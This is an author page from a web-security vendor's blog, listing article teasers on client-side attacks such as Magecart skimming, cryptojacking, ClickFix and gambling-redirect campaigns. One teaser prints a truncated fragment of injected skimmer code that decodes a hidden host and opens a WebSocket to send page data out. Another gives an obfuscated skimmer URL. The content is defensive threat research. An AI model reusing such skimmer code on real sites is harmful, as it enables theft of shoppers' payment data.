Skip to main content
Himanshu Anand
Software Engineer

Himanshu Anand

I'm a software engineer and security analyst.

Articles by Himanshu Anand

CryptoJacking is dead: long live CryptoJacking

Modern crypto jacking has evolved into a silent, multi-stage attacks.

Jul 17, 2025

Magecart targeting east asian e-commerce websites on OpenCart

We've detected a magecart-style attack targeting the OpenCart CMS platform

Jul 15, 2025

Affiliate hijacking and traffic hijacking: how fraud scripts reroute users

Affiliate hijacking steals commissions two ways: SERP bidding fraud intercepts users pre-click, browser-side scripts rewrite attribution mid-session.

Jul 10, 2025

Is relying on Indicators of Compromise secure enough?

Most security programs today still rely heavily on Indicators of Compromise (IOCs). This approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.

Jul 3, 2025

CoinMarketCap Client-Side Attack: A Comprehensive Analysis

On June 20, 2025, CoinMarketCap (CMC), a major real-time crypto data platform, experienced a client-side security incident.

Jun 23, 2025

Weaponized Google OAuth Triggers Malicious WebSocket

An attacker is using 'Google.com' to deliver and execute their own code in a weaponized Google OAuth attack.

Jun 10, 2025

Ruthless Client-Side Attacks Targeting Multiple Platforms with ClickFix

In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.

May 28, 2025

Chinese Adult Scam Targets Mobile Users Through PWA

We've identified a fresh injection campaign abusing third-party JavaScript to redirect users.

May 20, 2025

Over 150K websites hit by full-page hijack linking to Chinese gambling sites

We estimate that approximately 150,000 websites have been impacted by this campaign. The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese.

Mar 26, 2025

Thousands of websites hit by four backdoors in 3rd party JavaScript attack

While analyzing threats targeting WordPress frameworks, we found an attack where a single 3rd party JavaScript file was used to inject four separate backdoors into 1,000 compromised websites using cdn.csyndication[.]com/.

Mar 4, 2025

Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam

A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user's browser window, often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.

Feb 20, 2025

10,000 WordPress Websites Found Delivering MacOS and Windows Malware

We identified over 10,000 WordPress loading showing fake Google browser update leading to malware downloads.

Jan 27, 2025

Government and university websites targeted in ScriptAPI[.]dev client-side attack

Yesterday we discovered another client-side JavaScript attack targeting +500 websites, including governments and universities. The injected scripts create hidden links, pointing to external websites, inside the Document Object Model (DOM), the programming interface for web documents.

Jan 21, 2025

The cost of false positives - how we became a target

This week, we identified an intriguing use case involving the WP3[.]XYZ attack. It sparked interest across the community and led to better detection rates on platforms like VirusTotal. While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. We still want to keep the community aware of attacks like this and do better each time.

Jan 17, 2025

Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack

We've uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: "https://wp3.xyz/plugin[.]php".

Jan 13, 2025

New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com

This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here's a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a

Nov 4, 2024

New Magecart attack code revealed

On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h

Oct 23, 2024

Kuwait ecommerce site is being used to facilitate client-side skimming attacks

A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection,

Oct 3, 2024

Cisco client-side Magecart JavaScript attack

Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being

Sep 6, 2024

Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs

Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery

Jul 9, 2024
Book a demo

Want to walk through this with an engineer?

Thirty minutes, on your own site. Not a slide deck.

Book a personalized demo to see:

How to achieve PCI DSS requirement 6.4.3 & 11.6.1 compliance in 1 day
Why third-party scripts are a security risk for you and your visitors
Monitoring privacy and consent leakage (GDPR, CCPA) across every third party
Stopping signup abuse, account sharing, and chargeback fraud with device intelligence
Detecting and controlling AI agents and bots hitting your site in real time

Rather just send a question?

Finding open slots…

Real humans only. We'd know.

Having trouble booking? Open scheduler in a new tab

What are you trying to solve?

Tell us in a line and we'll come back with something useful, not a generic pitch.

We usually help with:

Seeing which third-party scripts run on your site
PCI DSS 6.4.3 and 11.6.1 evidence
Bots, AI agents and account takeover

Prefer to just book a time? Pick a slot instead